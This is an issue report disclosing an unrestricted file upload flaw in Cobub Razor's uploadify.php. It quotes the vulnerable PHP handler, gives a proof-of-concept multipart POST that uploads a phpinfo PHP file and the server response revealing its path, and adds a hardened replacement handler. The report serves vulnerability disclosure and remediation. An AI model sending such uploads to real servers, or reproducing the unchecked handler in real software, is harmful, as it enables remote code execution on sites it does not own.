Vulnerability: Cobub Razor file upload
kyrie403 opened this issue · comments
kyrie403 commented
Detail:
/web/assets/swf/uploadify.php Line 26:
Determine whether `$_FILES` is empty -> get the document root directory + folder + name -> upload the file. The file type is not restricted.

```php
if (!empty($_FILES)) {
    $tempFile = $_FILES['Filedata']['tmp_name'];
    // The target directory is built from the request parameter 'folder'
    $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
    // The client-supplied file name is appended unchanged
    $targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
    // The extension check is commented out:
    // $fileTypes = str_replace('*.','',$_REQUEST['fileext']);
    // $fileTypes = str_replace(';','|',$fileTypes);
    // $typesArray = split('\|',$fileTypes);
    // $fileParts = pathinfo($_FILES['Filedata']['name']);
    // if (in_array($fileParts['extension'],$typesArray)) {
    // Uncomment the following line if you want to make the directory if it doesn't exist
    // mkdir(str_replace('//','/',$targetPath), 0755, true);
    move_uploaded_file($tempFile,$targetFile);
    echo $targetFile;
}
```
POC:
Construct an upload POST:
```http
POST /razor/web/assets/swf/uploadify.php?folder=/razor/web/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 213
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------18467633426500
Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php"
Content-Type: image/jpeg

<?php phpinfo();?>
-----------------------------18467633426500
```
Upload success:
```http
HTTP/1.1 200 OK
Date: Fri, 29 Mar 2019 04:33:23 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.27
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57

D:/***/***/WWW/razor/web/phpinfo.php
```
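
A hardened counterpart to the handler quoted in the issue, as an added example that is not part of the original report or of the Cobub Razor code base. `UPLOAD_DIR`, `ALLOWED_TYPES` and `store_upload` are hypothetical names, and PHP 7 or later with the fileinfo extension is assumed.

```php
<?php
// Added example, not project code. UPLOAD_DIR and ALLOWED_TYPES are assumptions.
const UPLOAD_DIR = '/var/www/uploads';   // assumed: a directory where scripts are never executed
const ALLOWED_TYPES = [                  // allowed extension => expected MIME type
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
];

function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed.');
    }

    // The extension comes from the client-supplied name, so it is only
    // accepted when it appears in the allowlist ("phpinfo.php" stops here).
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new RuntimeException('File type not allowed.');
    }

    // Detect the type from the file content; the Content-Type header of the
    // multipart part is client-controlled and is ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException('File content does not match its extension.');
    }

    // Fixed directory and server-generated name: neither the 'folder'
    // parameter nor the original file name reaches the target path.
    $target = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('Could not store file.');
    }
    return basename($target);            // do not disclose the absolute path
}

if (!empty($_FILES['Filedata'])) {
    try {
        echo store_upload($_FILES['Filedata']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Upload rejected.';
    }
}
```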